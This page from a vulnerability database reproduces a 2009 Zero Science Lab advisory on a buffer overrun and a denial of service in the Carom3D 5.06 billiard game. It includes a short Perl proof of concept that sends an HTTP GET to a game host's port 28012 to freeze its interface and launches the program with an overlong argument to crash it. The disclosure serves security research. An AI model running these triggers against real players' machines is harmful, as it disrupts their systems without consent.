Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zeroscienceGjoko KrsticZSL-2009-4916
HistoryJun 16, 2009 - 12:00 a.m.

Carom3D 5.06 Unicode Buffer Overrun/DoS Vulnerability

2009-06-1600:00:00
Gjoko Krstic
zeroscience.mk
24

CVSS2

3.5

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

SINGLE

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

PARTIAL

AV:N/AC:M/Au:S/C:N/I:N/A:P

AI Score

7.1

Confidence

High

EPSS

0.022

Percentile

89.5%

JSON

Title: Carom3D 5.06 Unicode Buffer Overrun/DoS Vulnerability
Advisory ID: ZSL-2009-4916
Type: Local/Remote
Impact: System Access, DoS
Risk: (2/5)
Release Date: 16.06.2009

Summary

Carom 3D is an online multi-user billiard game created with special 3D graphic effects bringing every aspect such as 6 ball, 9 ball, 8 ball and other Billiard games to life.

Description

The world famous korean game Carom3D suffers from a buffer overflow and a denial of service vulnerability. The BoF is triggered at runtime when we append 218 > bytes as an argument. ~1000 bytes overwrites SEH. The denial of service is triggered when a user creates a LAN Game (cred. needed), creates a room and awaits other players to join the game. While awaiting (listening on TCP port 28012), with a simple HTTP GET/POST, an attacker can lockdown the GUI of the user created the room, not alowing to start or even exit the game’s GUI, unless forced quit (X).

Vendor

Neoact Co. Ltd. - <http://www.carom3d.com>

Affected Version

5.06

Tested On

Microsoft Windows XP Professional SP3 (English)

Vendor Status

N/A

PoC

carom3d.pl

Credits

Vulnerability discovered by Gjoko Krstic - <[email protected]>

References

[1] <http://www.milw0rm.com/exploits/8971&gt;
[2] <http://packetstormsecurity.org/filedesc/carom3d-dos.txt.html&gt;
[3] <http://securityreason.com/exploitalert/6430&gt;
[4] <http://sebug.net/exploit/11631/&gt;
[5] <https://vulners.com/cve/CVE-2009-2173&gt;
[6] <http://xforce.iss.net/xforce/xfdb/51219&gt;
[7] <http://securityreason.com/securityalert/5950&gt;

Changelog

[16.06.2009] - Initial release
[25.06.2009] - Added reference [7]

Contact

Zero Science Lab

Web: <http://www.zeroscience.mk>
e-mail: [email protected]

<html><body><p>#!/usr/bin/perl
#
# Title: Carom3D 5.06 Unicode Buffer Overrun/Denial Of Service Vulnerability
#
#
# Summary: Carom 3D is an online multi-user billiard game created with special
#	   3D graphic effects bringing every aspect such as 6 ball, 9 ball, 8
#	   ball and other Billiard games to life.
#
# Product Web Page: http://www.carom3d.com/
#
# Description: The world famous korean game Carom3D suffers from a buffer overflow
#	       and a denial of service vulnerability. The BoF is triggered at
#	       runtime when we append 218 &gt; bytes as an argument. ~1000 bytes
#	       overwrites SEH. The denial of service is triggered when a user
#	       creates a LAN Game (cred. needed), creates a room and awaits
#	       other players to join the game. While awaiting (listening on port
#	       28012), with a simple HTTP GET/POST, an attacker can lockdown
#	       the GUI of the user created the room, not alowing to start or
#	       even exit the game's GUI, unless forced quit (X).
#
# Tested On: Microsoft Windows XP Professional SP3 (English)
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#
# liquidworm gmail com
#
# http://www.zeroscience.org/
#
# 15.06.2009
#

# ----------------------------------DoS---------------------------------- #

use LWP::Simple;

my $url = 'http://192.168.1.3:28012';
my $lockdown = get $url;
die "Couldn't get $url" unless defined $lockdown;

# You can Ctrl+C, the lockdown is ON.

# ---------------------------------/DoS---------------------------------- #





###########################################################################





# ----------------------------------BoF---------------------------------- #

# Added 217 bytes as argument = runs normally.
# Added 218 bytes as argument triggers the MS VC++ Runtime Library
# 'Buffer Overrun' error msg box informing us that the program's
# internal state is corrupted.

system('C:\\Progra~1\\Neoact\\Carom3D\\carom.exe AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA');

# ---------------------------------/BoF---------------------------------- #</p></body></html>

Related

prion 1
nvd 1
cvelist 1
exploitdb 1
cve 1
prion
prion
Command injection
2009-06-23 21:30:00
nvd
nvd
CVE-2009-2173
2009-06-23 21:30:00
cvelist
cvelist
CVE-2009-2173
2009-06-23 21:21:00
exploitdb
exploitdb
Carom3D 5.06 - Unicode Buffer Overrun/Denial of Service
2009-06-16 00:00:00
cve
cve
CVE-2009-2173
2009-06-23 21:30:00

CVSS2

3.5

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

SINGLE

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

PARTIAL

AV:N/AC:M/Au:S/C:N/I:N/A:P

AI Score

7.1

Confidence

High

EPSS

0.022

Percentile

89.5%

JSON
Related for ZSL-2009-4916
prion1nvd1cvelist1exploitdb1cve1